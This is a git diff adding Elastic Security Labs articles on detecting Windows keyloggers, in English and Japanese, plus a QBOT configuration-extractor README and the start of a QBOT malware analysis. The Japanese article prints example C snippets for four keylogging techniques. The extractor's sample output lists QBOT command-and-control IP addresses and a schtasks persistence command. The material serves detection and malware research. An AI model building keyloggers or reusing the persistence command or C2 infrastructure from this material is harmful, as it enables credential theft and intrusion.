+ - [Keystrokes Input Capture via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_via_setwindowshookex.toml)
+
+With this new set of capabilities, Elastic Defend can provide comprehensive monitoring and detection of keylogging activity, enhancing the security and protection of Windows endpoints against these threats.
+
+### Detecting Windows keyloggers
+
+Next, let’s walk through an example of how the detection works in practice. We'll detect a keylogger using the Raw Input Model with Elastic Defend. For this example, we prepared a simple PoC keylogger named ```Keylogger.exe``` that uses the ```RegisterRawInputDevices``` API and executed it in our test environment ※5. (※5:The execution environment is Windows 10 Version 22H2 19045.4412, the latest version available at the time of writing.)
+
+![Elastic Security alert](/assets/images/protecting-your-devices-from-information-theft-keylogger-protection/image1.png)
+　
+Shortly after the keylogger was executed, a detection rule  ([Keystroke Input Capture via RegisterRawInputDevices](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml)) was triggered on the endpoint, showing an alert.  The further details of this alert can be viewed within Kibana.
+
+![Elastic Security alert dashboard](/assets/images/protecting-your-devices-from-information-theft-keylogger-protection/image3.png)
+
+Here are the details of the detection rule, note the specific API referenced in the example. 
+
+``` sql
+query = '''
+api where
+ process.Ext.api.name == "RegisterRawInputDevices" and not process.code_signature.status : "trusted" and
+ process.Ext.api.parameters.usage : ("HID_USAGE_GENERIC_KEYBOARD", "KEYBOARD") and
+ process.Ext.api.parameters.flags : "*INPUTSINK*" and process.thread.Ext.call_stack_summary : "?*" and
+ process.thread.Ext.call_stack_final_user_module.hash.sha256 != null and process.executable != null and
+ not process.thread.Ext.call_stack_final_user_module.path :
+                         ("*\\program files*", "*\\windows\\system32\\*", "*\\windows\\syswow64\\*",
+                          "*\\windows\\systemapps\\*",
+                          "*\\users\\*\\appdata\\local\\*\\kumospace.exe",
+                          "*\\users\\*\\appdata\\local\\microsoft\\teams\\current\\teams.exe") and 
+ not process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe")
+'''
+```
+
+This rule raises an alert when an unsigned process, or a process signed by an untrusted signer, calls the ```RegisterRawInputDevices``` API to capture keystrokes. More specifically, Elastic Defend monitors the arguments passed to the ```RegisterRawInputDevices``` API, particularly the members of the [```RAWINPUTDEVICE``` structure](https://learn.microsoft.com/en-us/windows/win32/api/winuser/ns-winuser-rawinputdevice), which is the first argument of this API.
+
+This raises an alert when these argument values indicate an attempt to capture keyboard input. The logs of the ```RegisterRawInputDevices``` API can also be viewed within Kibana.
+
+![```RegisterRawInputDevices``` API logs displayed in Kibana](/assets/images/protecting-your-devices-from-information-theft-keylogger-protection/image2.png)
+
+### Data Collected During Windows API Calls
+
+Due to space constraints, this article does not cover all of the detection rules and API details that were added. However, we will briefly describe the data that Elastic Defend collects during calls to the relevant Windows APIs. For further explanations for each item, please refer to the Elastic Common Schema (ECS) mapping detailed in [```custom_api.yml```](https://github.com/elastic/endpoint-package/blob/main/custom_schemas/custom_api.yml).
+
+| API Name | Field | Description | Example |
+| --- | --- | --- | --- |
+| GetAsyncKeyState | process.Ext.api.metadata.ms_since_last_keyevent | This parameter indicates an elapsed time in milliseconds between the last GetAsyncKeyState event. | 94 |
+| GetAsyncKeyState | process.Ext.api.metadata.background_callcount | This parameter indicates a number of all GetAsyncKeyState api calls, including unsuccessful calls, between the last successful GetAsyncKeyState call. | 6021 |
+| SetWindowsHookEx | process.Ext.api.parameters.hook_type | Type of hook procedure to be installed. | "WH_KEYBOARD_LL"
+| SetWindowsHookEx | process.Ext.api.parameters.hook_module | DLL containing the hook procedure. | "c:\\windows\\system32\\taskbar.dll"
+| SetWindowsHookEx | process.Ext.api.parameters.procedure | The memory address of the procedure or function. | 2431737462784 |
+| SetWindowsHookEx | process.Ext.api.metadata.procedure_symbol | Summary of the hook procedure. | "taskbar.dll" |
+| RegisterRawInputDevices | process.Ext.api.metadata.return_value | Return value of RegisterRawInputDevices API call. | 1 |
+| RegisterRawInputDevices | process.Ext.api.parameters.usage_page | This parameter indicates the top-level collection (Usage Page) of the device. First member RAWINPUTDEVICE structure. | "GENERIC" |
+| RegisterRawInputDevices | process.Ext.api.parameters.usage | This parameter indicates the specific device (Usage) within the Usage Page. Second member RAWINPUTDEVICE structure. | "KEYBOARD" |
+| RegisterRawInputDevices | process.Ext.api.parameters.flags | Mode flag that specifies how to interpret the information provided by UsagePage and Usage. Third member RAWINPUTDEVICE structure. | "INPUTSINK" |
+| RegisterRawInputDevices | process.Ext.api.metadata.windows_count | Number of windows owned by the caller thread. | 2 |
+| RegisterRawInputDevices | process.Ext.api.metadata.visible_windows_count | Number of visible windows owned by the caller thread. | 0 |
+| RegisterRawInputDevices | process.Ext.api.metadata.thread_info_flags | Thread info flags. | 16 |
+| RegisterRawInputDevices | process.Ext.api.metadata.start_address_module | Name of the module associated with the starting address of a thread. | "C:\\Windows\\System32\\DellTPad\\ApMsgFwd.exe" |
+| RegisterRawInputDevices | process.Ext.api.metadata.start_address_allocation_protection | Memory protection attributes associated with the starting address of a thread. | "RCX" |
+
+## Conclusion
+
+In this article, we introduced the keylogger and keylogging detection features for Windows environments that were added starting from Elastic Defend 8.12. Specifically, by monitoring calls to representative Windows APIs related to keylogging, we have integrated a behavioral keylogging detection approach that does not rely on signatures. To ensure accuracy and reduce the false positive rate, we have created this feature and new rules based on months of research.
+
+In addition to keylogging-related APIs, Elastic Defend also monitors [other APIs commonly used by malicious actors, such as those for memory manipulation](https://www.elastic.co/security-labs/doubling-down-etw-callstacks), providing multi-layered protection. If you are interested in Elastic Security and Elastic Defend, please check out the [product page](https://www.elastic.co/security) and [documentation](https://www.elastic.co/videos/intro-elastic-security).
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/protecting_your_devices_from_information_theft_keylogger_protection_jp.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/protecting_your_devices_from_information_theft_keylogger_protection_jp.md
new file mode 100644
index 0000000000000..7c239d1f48127
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/protecting_your_devices_from_information_theft_keylogger_protection_jp.md
@@ -0,0 +1,250 @@
+---
+title: "情報窃取から端末を守る"
+slug: "protecting-your-devices-from-information-theft-keylogger-protection-jp"
+date: "2020-05-30"
+subtitle: "Windows APIの挙動を用いたキーロガー検知"
+description: "本記事ではElastic Securityにおいて、エンドポイント保護を担っているElastic Defendに今年(バージョン8.12より)新たに追加された、キーロガーおよびキーロギング検出機能について紹介します。"
+author:
+- slug: asuka-nakajima
+image: "Security Labs Images 10.jpg"
+category:
+  - slug: security-operations
+  - slug: security-research
+  - slug: detection-science
+tags:
+  - detection engineering
+  - threat hunting
+  - threat detection
+---
+
+本記事ではElastic Securityにおいて、エンドポイント保護を担っているElastic Defendに今年(バージョン[8.12](https://www.elastic.co/guide/en/security/8.12/release-notes-header-8.12.0.html#enhancements-8.12.0)より)新たに追加された、キーロガーおよびキーロギング検出機能について紹介します。
+
+## はじめに
+
+Elastic Defend 8.12より、Windows上で動作するキーロガーおよび、キーロギング機能を備えたマルウェア(情報窃取型マルウェアや、リモートアクセス型トロイの木馬、通称RAT)の検知の強化を目的に、キーロガーが使用する代表的なWindows API群の呼び出しを監視・記録する機能が追加されました。本記事ではこの新機能に焦点を当て、その技術的な詳細を解説します。加えて、本機能に付随して新たに作成された振る舞い検知ルール(Prebuilt rule)についても紹介します。
+
+### キーロガーとはなにか？どのような危険性があるのか？
+
+キーロガーとは、コンピュータ上で入力されたキーの内容を監視および記録(キーロギング)するソフトウェアの一種です(※1)。キーロガーは、ユーザのモニタリングなどの正当な理由で利用されることもありますが、攻撃者によって頻繁に悪用されるソフトウェアです。具体的には、ユーザがキーボード経由で入力した認証情報やクレジットカード情報、各種機密情報などのセンシティブな情報の窃取などに際に使われます。(※1: パソコンにUSB等で直接取り付けるようなハードウェア型のキーロガーもありますが、本記事ではソフトウェア型のキーロガーに焦点を当てます。)
+
+キーロガーを通じて入手したセンシティブな情報は、金銭の窃取やさらなるサイバー攻撃の足がかりに悪用されます。それゆえに、キーロギング行為自体は直接的にコンピュータに被害をおよばさないものの、続くサイバー攻撃の被害を食い止めるためにも、早期の検知が非常に重要だと言えます。
+
+キーロギング機能を持つマルウェアは多々あり、特にRAT、情報窃取型マルウェア、バンキングマルウェアといった種類のマルウェアにキーロギング機能が搭載されている場合があることが確認されています。有名なマルウェアでキーロギング機能を有するものとしては[Agent Tesla](https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla)や[Lokibit](https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot)、そして[SnakeKeylogger](https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger)などが挙げられます。
+
+### いかにして入力した文字を盗み取っているのか？
+
+では次に、キーロガーはいかにしてユーザがキーボードから入力した文字を、ユーザに気づかれること無く盗み取っているのかを、技術的な観点から説明していきます。キーロガー自体は、あらゆるOS環境(Windows/Linux/macOSやモバイルデバイス)で存在しうるものではありますが、本記事ではWindowsのキーロガーに焦点を絞って解説します。特にWindows APIや機能を使用してキー入力を取得する4つの異なるタイプのキーロガーについて解説します。
+
+一点補足としては、ここでキーロギングの手法について説明しているのは、あくまで本記事後半で紹介している、新しい検知機能についての理解を深めていただくためです。そのため、例として掲載しているコードはあくまで単なる例であり、実際にそのまま動くコードが掲載されている訳ではありません(※3)。
+
+(※2:  Windows上で動作するキーロガーは、カーネル空間(OS)側に設置されるものと、通常のアプリケーションと同じ領域(ユーザ空間)に設置されるものに大別されます。本記事では、後者のタイプを取り上げます。 )
+(※3: 以下に掲載されている例のコードを元にキーロガーを作成し悪用した場合、弊社では対応、および、責任について負いかねます 。)
+
+ 1. ポーリング型キーロガー
+ 
+このタイプのキーロガーは、キーボードの各キーの状態(キーが押された否か)を短い間隔(1秒よりはるかに短い間隔)で定期的に確認します。そして前回の確認以降に、新たに押されたキーがあることが判明した場合、その押されたキーの文字の情報を記録・保存します。この一連の流れを繰り返すことで、キーロガーは、ユーザが入力した文字列の情報を取得しているのです。
+
+ポーリング型のキーロガーは、キーの入力状態をチェックするWindowsのAPIを利用して実装されており、代表的には [```GetAsyncKeyState```](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-getasynckeystate) APIが利用されます。このAPIは、特定のキーが現在押されているか否かに加えて、その特定のキーが前回のAPI呼び出し以降押されたか否かの情報を取得することが出来ます。以下が```GetAsyncKeyState``` APIを使ったポーリング型キーロガーの簡単な例です。
+
+``` C
+while(true)
+{
+    for (int key = 1; key <= 255; key++)
+    {
+        if (GetAsyncKeyState(key) & 0x01)
+        {
+            SaveTheKey(key, "log.txt");
+        }
+    }
+    Sleep(50);
+}
+```
+
+ポーリング(```GetAsyncKeyState```)を用いてキー押下状態を取得する手法は、古くから存在する典型的なキーロギングの手法として知られているだけでなく、今でもマルウェアによって使われていることが確認されています。
+ 
+ 2. フッキング型キーロガー
+ 
+フッキング型キーロガーは、ポーリング型キーロガーと同じく、古くから存在する典型的な種類のキーロガーです。ここではまず「そもそもフックとは何か？」について説明します。
+
+フックとは大雑把に言うと「アプリケーションの特定の処理に、独自の処理を割り込ませる仕組み」のことを指す言葉です。そして、フックを使って独自の処理を割り込ませることを「フックする」とも言います。Windowsでは、アプリケーションに対するキー入力などのメッセージ(イベント)をフックすることが出来る仕組みが用意されており、この仕組みは[SetWindowsHookEx](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-setwindowshookexa) APIを通じて利用することが出来ます。以下が```SetWindowsHookEx``` APIを使ったポーリング型キーロガーの簡単な例です。
+
+``` C
+HMODULE hHookLibrary = LoadLibraryW(L"hook.dll");
+FARPROC hookFunc = GetProcAddress(hHookLibrary, "SaveTheKey");
+
+HHOOK keyboardHook = NULL;
+    
+keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL,
+                (HOOKPROC)hookFunc,
+                hHookLibrary,
+                0);
+```
+
+ 3. Raw Input Modelを用いたキーロガー
+ 
+このタイプのキーロガーは、キーボードなどの入力デバイスから得られた、生の入力データ(Raw Input)を取得し、それを保存・記録します。このキーロガーの詳細について説明する前に、まずWindowsにおける入力方式である「Original Input Model」と「Raw Input Model」について理解する必要があります。以下がそれぞれの入力方式についての説明です。
+
+ - **Original Input Model**:  キーボードなどの入力デバイスから入力されたデータを、一度OSを介して必要な処理をした後、アプリケーション側に届ける方式
+ - **Raw Input Model**:  キーボードなどの入力デバイスから入力されたデータを、そのままアプリケーション側が直接受け取る方式
+
+Windowsでは当初、Original Input Modelのみが使われていました。しかしWindows XP以降に、おそらくは入力デバイスの多様化などの要因から、Raw Input Modelが導入されました。Raw Input Modelでは、[```RegisterRawInputDevices```](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-registerrawinputdevices) APIを使い、入力データを直接受け取りたい入力デバイスを登録します。そしてその後、[```GetRawInputData```](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-getrawinputdata)) APIを用いて生データを取得します。
+以下がこれらのAPIを使った、Raw Input Modelを用いたキーロガーの簡単な例です。
+
+``` C
+LRESULT CALLBACK WndProc(HWND hWnd, UINT uMessage, WPARAM wParam, LPARAM lParam)
+{
+
+    UINT dwSize = 0;
+    RAWINPUT* buffer = NULL;
+
+    switch (uMessage)
+    {
+    case WM_CREATE:
+        RAWINPUTDEVICE rid;
+        rid.usUsagePage = 0x01;  // HID_USAGE_PAGE_GENERIC
+        rid.usUsage = 0x06;      // HID_USAGE_GENERIC_KEYBOARD
+        rid.dwFlags = RIDEV_NOLEGACY | RIDEV_INPUTSINK;
+        rid.hwndTarget = hWnd;
+        RegisterRawInputDevices(&rid, 1, sizeof(rid));
+        break;
+    case WM_INPUT:
+        GetRawInputData((HRAWINPUT)lParam, RID_INPUT, NULL,
+&dwSize, sizeof(RAWINPUTHEADER));
+
+        buffer = (RAWINPUT*)HeapAlloc(GetProcessHeap(), 0, dwSize);
+
+        if (GetRawInputData((HRAWINPUT)lParam, RID_INPUT, buffer, 
+&dwSize, sizeof(RAWINPUTHEADER)))
+        {
+            if (buffer->header.dwType == RIM_TYPEKEYBOARD)
+            {
+                SaveTheKey(buffer, "log.txt");
+            }
+        }
+        HeapFree(GetProcessHeap(), 0, buffer);
+        break;
+    default:
+        return DefWindowProc(hWnd, uMessage, wParam, lParam);
+    }
+    return 0;
+}
+```
+
+この例では、最初に生入力を受け取りたい入力デバイスを```RegisterRawInputDevices```を用いて、登録します。ここでは、キーボードの生入力データを受け取るように設定・登録しています。
+
+ 4. ```DirectInput```を用いたキーロガー
+ 
+最後に、```DirectInput```を用いたキーロガーについて説明します。このキーロガーは簡単に言えばMicrosoft DirectXの機能を悪用したキーロガーです。DirectXとは、ゲームや動画などのマルチメディア関連の処理を扱うためのAPI群の総称(ライブラリ)です。
+
+ゲームにおいて、ユーザから各種入力が取得できることは必須機能と言って良いことから、DirectXにおいてもユーザの入力を処理するAPI群が提供されています。そして、DirectXのバージョン8以前に提供されていたそれらAPI群のことを「DirectInput」と呼びます。以下が```DirectInput```に関連するAPIを使ったキーロガーの簡単な例です。補足ですが、```DirectInput```を用いてキーを取得する際、裏では```RegisterRawInputDevices``` APIが呼ばれています。
+
+``` C
+LPDIRECTINPUT8		lpDI = NULL;
+LPDIRECTINPUTDEVICE8	lpKeyboard = NULL;
+
+BYTE key[256];
+ZeroMemory(key, sizeof(key));
+
+DirectInput8Create(hInstance, DIRECTINPUT_VERSION, IID_IDirectInput8, (LPVOID*)&lpDI, NULL);
+lpDI->CreateDevice(GUID_SysKeyboard, &lpKeyboard, NULL);
+lpKeyboard->SetDataFormat(&c_dfDIKeyboard);
+lpKeyboard->SetCooperativeLevel(hwndMain, DISCL_FOREGROUND | DISCL_NONEXCLUSIVE | DISCL_NOWINKEY);
+
+while(true)
+{
+    HRESULT ret = lpKeyboard->GetDeviceState(sizeof(key), key);
+    if (FAILED(ret)) {
+        lpKeyboard->Acquire();
+        lpKeyboard->GetDeviceState(sizeof(key), key);
+    }
+  SaveTheKey(key, "log.txt");	
+    Sleep(50);
+}
+```
+
+## Windows API呼び出しを監視してキーロガーを検出する
+
+Elastic Defendでは、Event Tracing for Windows (ETW ※4)を用いて、前述の種類のキーロガーを検知しています。具体的には、関連するWindows API群の呼び出しを監視し、その挙動のログを取得することで実現しています。監視するWindows API群と、付随して新規に作成したキーロガーの検知ルールは以下です。(※4 一言でいうとWindowsが提供する、アプリケーションやデバイスドライバなどのシステム側のコンポーネントを、トレースおよびロギングする仕組み。)
+
+### 監視するWindows API群:
+
+ - [GetAsyncKeyState](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getasynckeystate)
+ - [SetWindowsHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexw)
+ - [RegisterRawInputDevice](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerrawinputdevices)
+
+### 追加したキーロガー検知ルール一覧:
+
+ - [GetAsyncKeyState API Call from Suspicious Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_suspicious_process.toml)
+ - [GetAsyncKeyState API Call from Unusual Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_getasynckeystate_api_call_from_unusual_process.toml)
+ - [Keystroke Input Capture via DirectInput](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_directinput.toml)
+ - [Keystroke Input Capture via RegisterRawInputDevices](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml)
+ - [Keystroke Messages Hooking via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_messages_hooking_via_setwindowshookex.toml)
+ - [Keystrokes Input Capture from a Managed Application](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_managed_application.toml)
+ - [Keystrokes Input Capture from a Suspicious Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_a_suspicious_module.toml)
+ - [Keystrokes Input Capture from Suspicious CallStack](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_suspicious_callstack.toml)
+ - [Keystrokes Input Capture from Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_from_unsigned_dll.toml)
+ - [Keystrokes Input Capture via SetWindowsHookEx](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystrokes_input_capture_via_setwindowshookex.toml)
+
+新規に追加した機能および検知ルールにより、Elastic Defendにてキーロガー・キーロギングの包括的な監視と検出が可能となり、これらの脅威に対するWindowsエンドポイントのセキュリティと保護の強化を実現しました。
+
+### Windowsのキーロガーを検知する
+
+次に実際の検知の様子をお見せします。例として、Raw Input Modelを用いたキーロガーをElastic Defendで検出してみます。ここでは```RegisterRawInputDevices``` APIを用いた簡易的なキーロガー「Keylogger.exe」を用意し、テスト環境で実行してみました※5。(※5 実行環境はWindows 10の執筆時点の最新版であるWindows 10 Version 22H2 19045.4412です。)
+
+![Elastic Securityのアラート](/assets/images/protecting-your-devices-from-information-theft-keylogger-protection/image1.png)
+
+キーロガーを実行した直後に、検知ルール([Keystroke Input Capture via ```RegisterRawInputDevices```](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/collection_keystroke_input_capture_via_registerrawinputdevices.toml))が発動し、エンドポイント側でアラートが上がりました。このアラートのさらなる詳細はKibana上から見ることが出来ます。
+
+![Elastic Securityのアラートダッシュボード](/assets/images/protecting-your-devices-from-information-theft-keylogger-protection/image3.png)
+
+以下が検知ルールの詳細です。検知に使われているAPIの部分を中心に説明します。
+
+``` sql
+query = '''
+api where
+ process.Ext.api.name == "RegisterRawInputDevices" and not process.code_signature.status : "trusted" and
+ process.Ext.api.parameters.usage : ("HID_USAGE_GENERIC_KEYBOARD", "KEYBOARD") and
+ process.Ext.api.parameters.flags : "*INPUTSINK*" and process.thread.Ext.call_stack_summary : "?*" and
+ process.thread.Ext.call_stack_final_user_module.hash.sha256 != null and process.executable != null and
+ not process.thread.Ext.call_stack_final_user_module.path :
+                         ("*\\program files*", "*\\windows\\system32\\*", "*\\windows\\syswow64\\*",
+                          "*\\windows\\systemapps\\*",
+                          "*\\users\\*\\appdata\\local\\*\\kumospace.exe",
+                          "*\\users\\*\\appdata\\local\\microsoft\\teams\\current\\teams.exe") and 
+ not process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe")
+'''
+```
+
+このアラートは簡単に言うと「署名されていないプロセス」または「署名されているが、その署名者が信頼できないプロセス」が、キー入力を取得する目的で```RegisterRawInputDevices```  APIを呼び出した時に発せられるアラートです。```RegisterRawInputDevices``` APIが呼び出された際の引数の情報に着目しており、より具体的にはAPIの第一引数である、[RAWINPUTDEVICE](https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/ns-winuser-rawinputdevice)構造体のメンバの情報を検知に用いています。
+
+この引数の値が、キーボード入力の取得を試みていることを示している場合、キーロガーが実行されたと見なして、アラートを上げるようになっています。 ```RegisterRawInputDevices``` APIのログはKibana上でも確認できます。
+
+![Kibana上で確認できるRegisterRawInputDevices APIログ](/assets/images/protecting-your-devices-from-information-theft-keylogger-protection/image2.png)
+
+### 各Windows APIの呼び出しの際に取得しているデータ
+
+分量の都合で、追加したすべての検知ルールとAPIの詳細については本記事では説明しません。ですが最後に、対象のWindows APIの呼び出しの際にElastic Defend側で取得しているデータについて、簡単にご紹介します。各項目についてさらに知りたい方は、[custom_api.yml](https://github.com/elastic/endpoint-package/blob/main/custom_schemas/custom_api.yml)に記載されているElastic Common Schema（ECS）とのマッピングをご参照ください。
+
+| API名 | フィールド | 説明(原文を日本語訳したもの) | 例 |
+| --- | --- | --- | --- |
+| GetAsyncKeyState | process.Ext.api.metadata.ms_since_last_keyevent | このパラメーターは、最後の GetAsyncKeyState イベントからの経過時間をミリ秒で示します。 | 94 |
+| GetAsyncKeyState | process.Ext.api.metadata.background_callcount | このパラメーターは、最後に成功した GetAsyncKeyState 呼び出しからの間に行われた、失敗した呼び出しも含めたすべての GetAsyncKeyState API 呼び出しの回数を示します。 | 6021 |
+| SetWindowsHookEx | process.Ext.api.parameters.hook_type | Tインストールするフックの種類 | "WH_KEYBOARD_LL"
+| SetWindowsHookEx | process.Ext.api.parameters.hook_module | フック先の処理を保有するDLL | "c:\\windows\\system32\\taskbar.dll"
+| SetWindowsHookEx | process.Ext.api.parameters.procedure | フック先となる処理や関数のメモリアドレス | 2431737462784 |
+| SetWindowsHookEx | process.Ext.api.metadata.procedure_symbol | フック先の処理の要約 | "taskbar.dll" |
+| RegisterRawInputDevices | process.Ext.api.metadata.return_value | RegisterRawInputDevices API 呼び出しの戻り値 | 1 |
+| RegisterRawInputDevices | process.Ext.api.parameters.usage_page | このパラメーターはデバイスのトップレベルコレクション（Usage Page）を示す。RAWINPUTDEVICE 構造体の最初のメンバ | "GENERIC" |
+| RegisterRawInputDevices | process.Ext.api.parameters.usage | このパラメーターは、Usage Page 内の特定のデバイス（Usage）を示します。RAWINPUTDEVICE 構造体の２番目のメンバ | "KEYBOARD" |
+| RegisterRawInputDevices | process.Ext.api.parameters.flags | UsagePageとUsageによって提供される情報をどのように解釈するかを指定するモードフラグ。RAWINPUTDEVICE 構造体の３番目のメンバ | "INPUTSINK" |
+| RegisterRawInputDevices | process.Ext.api.metadata.windows_count | 呼び出し元スレッドが所有するウィンドウの数 | 2 |
+| RegisterRawInputDevices | process.Ext.api.metadata.visible_windows_count | 呼び出し元スレッドが所有する表示されているウィンドウの数 | 0 |
+| RegisterRawInputDevices | process.Ext.api.metadata.thread_info_flags | スレッドの情報を表すフラグ | 16 |
+| RegisterRawInputDevices | process.Ext.api.metadata.start_address_module | スレッドの開始アドレスに紐づくモジュールの名前 | "C:\\Windows\\System32\\DellTPad\\ApMsgFwd.exe" |
+| RegisterRawInputDevices | process.Ext.api.metadata.start_address_allocation_protection | スレッドの開始アドレスに紐づくメモリ保護属性 | "RCX" |
+
+## まとめ
+
+本記事では、Elastic Defend 8.12にて導入された、Windows環境におけるキーロガーおよびキーロギング検知機能についてご紹介しました。具体的には、キーロギングに関連する代表的なWindows API群の呼び出しを監視することで、シグネチャに依存しない、振る舞い検知によるキーロガー検出を実現しました。精度を高め、誤検知率を減らすために、数ヶ月にわたる研究・調査をもとにこの機能と新しいルールを開発しました。
+
+Elastic Defendではキーロガー関連のAPI以外にも、攻撃者に一般的に利用されるメモリ操作等の[API群なども監視すること](https://www.elastic.co/security-labs/doubling-down-etw-callstacks)で、多層的な防御を実現しております。Elastic Security および Elastic Defendについて気になった方はぜひ[製品ページ](https://www.elastic.co/jp/security)や[ドキュメント](https://www.elastic.co/jp/videos/intro-elastic-security)を御覧頂ければ幸いです。
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/qbot_configuration_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/qbot_configuration_extractor.md
new file mode 100644
index 0000000000000..75feda4da8b4d
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/qbot_configuration_extractor.md
@@ -0,0 +1,88 @@
+---
+title: "QBOT Configuration Extractor"
+slug: "qbot-configuration-extractor"
+date: "2022-12-06"
+subtitle: "Configuration extraction tool for QBOT malware"
+description: "Python script to extract the configuration from QBOT samples."
+author:
+  - slug: elastic-security-labs
+image: "tools-image.jpg"
+category:
+  - slug: tools
+tags:
+  - qbot
+  - ref3726
+  - qakbot
+---
+
+Python script to extract the configuration from QBOT samples.
+
+[Download qbot-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta4523f3b586ba6ac/62e16e26d2f5267009ac073a/qbot-config-extractor.tar.gz)
+
+## Getting Started
+
+This tool provides a Python module and command line tool that will extract configurations from the QBOT malware samples and dump the results to screen.
+
+> For information on the QBOT attack pattern and malware analysis, check out our blog posts detailing this:
+>
+> - [Exploring the QBOT Attack Pattern](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern)
+> - [QBOT Malware Analysis](https://www.elastic.co/security-labs/qbot-malware-analysis)
+
+### Docker
+
+We can easily run the extractor with Docker, first we need to build the image:
+
+```
+docker build . -t qbot-config-extractor
+```
+
+Then we run the container with the **-v** flag to map a host directory to the docker container directory:
+
+```
+docker run -ti --rm -v \
+"$(pwd)/data":/data qbot-config-extractor:latest -d /data/
+```
+
+We can either specify a single sample with **-f** option or a directory of samples with **-d**.
+
+```
+$ docker run -ti --rm -v $(pwd)/data:/data qbot-config-extractor:latest -f data/c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a
+
+=== Strings ===
+# Blob address: 0x100840a0
+# Key address: 0x10084040
+[0x0]: ProgramData
+[0xc]: /t4
+[0x10]: EBBA
+[0x15]: netstat -nao
+[0x22]: jHxastDcds)oMc=jvh7wdUhxcsdt2
+[0x40]: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
+
+...truncated...
+
+=== RESOURCE 1 ===
+Key: b'\\System32\\WindowsPowerShel1\\v1.0\\powershel1.exe'
+Type: DataType.DOMAINS
+41.228.22.180:443
+47.23.89.62:995
+176.67.56.94:443
+103.107.113.120:443
+148.64.96.100:443
+47.180.172.159:443
+181.118.183.98:443
+
+...truncated...
+```
+
+### Running it Locally
+
+As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+poetry lock
+poetry install
+poetry shell
+qbot-config-extractor -h
+```
+
+Once that works, you can do the same sort of things as mentioned in the Docker instructions above.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/qbot_malware_analysis.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/qbot_malware_analysis.md
new file mode 100644
index 0000000000000..9e7ebe4fcd03c
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/qbot_malware_analysis.md
@@ -0,0 +1,476 @@
+---
+title: "QBOT Malware Analysis"
+slug: "qbot-malware-analysis"
+date: "2023-02-14"
+description: "Elastic Security Labs releases a QBOT malware analysis report covering the execution chain. From this research, the team has produced a YARA rule, configuration-extractor, and indicators of compromises (IOCs)."
+author:
+  - slug: cyril-francois
+image: "blog-thumb-drill-bit.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - ref3726
+  - qbot
+  - qakbot
+---
+
+## Key takeaways
+
+- Elastic Security Labs is releasing a QBOT malware analysis report from a recent [campaign](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern)
+- This report covers the execution chain from initial infection to communication with its command and control containing details about in depth features such as its injection mechanism and dynamic persistence mechanism.
+- From this research we produced a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Qbot.yar), [configuration-extractor](https://www.elastic.co/security-labs/qbot-configuration-extractor), and indicators of compromises (IOCs)
+
+## Preamble
+
+As part of our mission to build knowledge about the most common malware families targeting institutions and individuals, the Elastic Malware and Reverse Engineering team (MARE) completed the analysis of the core component of the banking trojan QBOT/QAKBOT V4 from a previously reported [campaign](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern).
+
+QBOT — also known as QAKBOT — is a modular Trojan active since 2007 used to download and run binaries on a target machine. This document describes the in-depth reverse engineering of the QBOT V4 core components. It covers the execution flow of the binary from launch to communication with its command and control (C2).
+
